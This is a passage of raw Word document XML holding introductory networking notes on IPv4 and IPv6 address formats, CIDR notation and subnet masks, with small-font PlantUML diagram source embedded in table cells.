                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of street : Identifies specific address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1351520B" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of host : Identifies specific device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C52C64" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="147F7F3A" w14:textId="7444BB3C" w:rsidR="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D028870" w14:textId="4D5E0F46" w:rsidR="0074642F" w:rsidRDefault="00672E5B" w:rsidP="0074642F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction to</w:t>
      </w:r>
      <w:r w:rsidR="0074642F" w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBE6FD" w14:textId="6B46EF2A" w:rsidR="00672E5B" w:rsidRPr="00672E5B" w:rsidRDefault="00672E5B" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538FB05" w14:textId="77777777" w:rsidR="0074642F" w:rsidRDefault="0074642F" w:rsidP="0074642F">
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve">An IP address is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unique identifier for a device on a network</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180DE1C" w14:textId="41E72D8F" w:rsidR="009D1C68" w:rsidRDefault="009D1C68" w:rsidP="0074642F">
      <w:r w:rsidRPr="009D1C68">
        <w:t>OSI Layer: Network (Layer 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CFAD3" w14:textId="07B51B97" w:rsidR="00C01BEA" w:rsidRPr="0074642F" w:rsidRDefault="00C01BEA" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7602A97B" w14:textId="13A22A00" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>IPv4 Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CDC80" w14:textId="77777777" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>32 bits, split into 4 octets: 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57140E6A" w14:textId="77777777" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>Each octet ranges from 0 to 255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779D246" w14:textId="77777777" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>Binary form: 11000000.10101000.00000001.00001010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57849222" w14:textId="10382104" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>IPv6 Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6FFDD" w14:textId="77777777" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>128 bits, written in hexadecimal: 2001:0db8:85a3:0000:0000:8a2e:0370:7334</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A00FD" w14:textId="113415E0" w:rsidR="0074642F" w:rsidRDefault="0074642F" w:rsidP="00F033D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00046A1F">
        <w:t>v4</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> Address</w:t>
      </w:r>
      <w:r w:rsidR="00F033D3">
        <w:t>ing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418D0DC" w14:textId="4E6FC865" w:rsidR="00F033D3" w:rsidRPr="00F033D3" w:rsidRDefault="00F033D3" w:rsidP="00F033D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4CA7D" w14:textId="6BC5A4C2" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="0074642F">
      <w:r w:rsidRPr="0074642F">
        <w:t>Every IP</w:t>
      </w:r>
      <w:r w:rsidR="00046A1F">
        <w:t>v4</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> address has </w:t>
      </w:r>
      <w:r w:rsidR="004F31B7">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC922C8" w14:textId="75470829" w:rsidR="0074642F" w:rsidRPr="0074642F" w:rsidRDefault="0074642F" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network portion</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C01BEA">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t>dentifies the subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214838C9" w14:textId="441C81D4" w:rsidR="0074642F" w:rsidRDefault="0074642F" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host portion</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C01BEA">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t>dentifies the device within that subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76D33F" w14:textId="1A018E1E" w:rsidR="004F31B7" w:rsidRDefault="004F31B7" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F31B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIDR</w:t>
      </w:r>
      <w:r>
        <w:t>: T</w:t>
      </w:r>
      <w:r w:rsidRPr="004F31B7">
        <w:t>ells how many bits of the IP address are reserved for the network portion. The rest are for host portion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C7EA1" w14:textId="3DD9FC3A" w:rsidR="004F31B7" w:rsidRPr="0074642F" w:rsidRDefault="004F31B7" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008E3EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet mask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: All bits that represent the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F31B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network portion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are set to 1. All bits that represent the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F31B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F31B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are set to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A95B5" w14:textId="77777777" w:rsidR="00C01BEA" w:rsidRPr="00C01BEA" w:rsidRDefault="0074642F" w:rsidP="00C01BEA">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CD544" w14:textId="306AF1BD" w:rsidR="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="00C01BEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The IP </w:t>
      </w:r>
      <w:r w:rsidR="0074642F" w:rsidRPr="0074642F">
        <w:t>192.168.1.10/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0F263" w14:textId="77777777" w:rsidR="00C01BEA" w:rsidRPr="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>Network portion: 192.168.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE31C49" w14:textId="4BBBBD2C" w:rsidR="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>Host portion: .10 (the specific device within that network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACDCD51" w14:textId="77777777" w:rsidR="004F31B7" w:rsidRDefault="004F31B7" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>CIDR: /24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA558C2" w14:textId="7739ADCF" w:rsidR="004F31B7" w:rsidRDefault="004F31B7" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Subnet mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654F4F2" w14:textId="705144CF" w:rsidR="00C01BEA" w:rsidRPr="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="00C01BEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE7CF2" w14:textId="3F4F1080" w:rsidR="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>192.168.1.10 is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>full IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It has </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>32 bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t> total.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB40BF" w14:textId="23E356A6" w:rsidR="00FA148D" w:rsidRPr="00C01BEA" w:rsidRDefault="00FA148D" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The IP has bit presentation as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA148D">
        <w:t>11000000.10101000.00000001.00001010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A747CB" w14:textId="0E52C505" w:rsidR="00C01BEA" w:rsidRDefault="00C01BEA" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>/24 is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIDR notation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>, which tells us how many bits are used for the network portion.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In thi</w:t>
      </w:r>
      <w:r w:rsidR="004F31B7">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first 24 bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F31B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t>That leaves </w:t>
      </w:r>
      <w:r w:rsidRPr="004F31B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8 bits</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01BEA">
        <w:t> for the host portion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329E725" w14:textId="1018E5A8" w:rsidR="004F31B7" w:rsidRDefault="004F31B7" w:rsidP="008E3EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F31B7">
        <w:t>By setting all bit in the network portion to 1, and clear all bits in the host portion to 0, you have the subnet mask as 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FDA914" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00F033D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Subnet Masks and CIDR Notation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454C48D2" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00F033D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD7517" w14:textId="57F720DB" w:rsidR="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:r w:rsidRPr="00046A1F">
        <w:t>Subnet masks – in IPv4 – are 32-bit numbers that define which portion of an IP address represents the network and which portion represents the host. They work in conjunction with IP addresses to determine network boundaries and enable routing decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9270FD" w14:textId="36F0C5B5" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:r w:rsidRPr="00046A1F">
        <w:t>CIDR (Classless Inter-Domain Routing) notation is a compact way to represent subnet masks using a slash followed by the number of network bits (e.g., /24).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFAC4E" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00F033D3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2111E" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:r w:rsidRPr="00046A1F">
        <w:t>Subnet masks operate through binary logic to separate network and host portions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E6033F" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Convert to binary: Both IP address and subnet mask become 32-bit binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E174016" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Apply AND operation: Mask bits determine which address bits represent network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D02484E" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Identify network: 1 bits in mask preserve corresponding IP address bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CE101" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Identify host: 0 bits in mask zero out corresponding IP address bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70C931" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00046A1F">
        <w:t>Result: Network address with host portion zeroed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8"/>
        <w:gridCol w:w="1818"/>
      </w:tblGrid>
      <w:tr w:rsidR="00046A1F" w14:paraId="41944740" w14:textId="77777777" w:rsidTr="00046A1F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5A3213" w14:textId="6C419751" w:rsidR="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="003E7608">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B56F0C5" wp14:editId="3DCF32B0">
                  <wp:extent cx="8909232" cy="4304581"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
                  <wp:docPr id="775058776"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66" cy="4329045"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="176CED0C" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml Subnet_Mask_Logic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48CE964A" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="386876D1" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title Subnet Mask Binary Logic - Network vs Host Identification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AA2F2EA" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="784DBD51" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "IP Address: 192.168.1.100" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5964C31C" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "192\n11000000" as ip1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099DFE97" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "168\n10101000" as ip2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3C8C2C" w14:textId="77777777" w:rsidR="00046A1F" w:rsidRPr="00046A1F" w:rsidRDefault="00046A1F" w:rsidP="00046A1F">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046A1F">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "1\n00000001" as ip3</w:t>
            </w:r>
          </w:p>
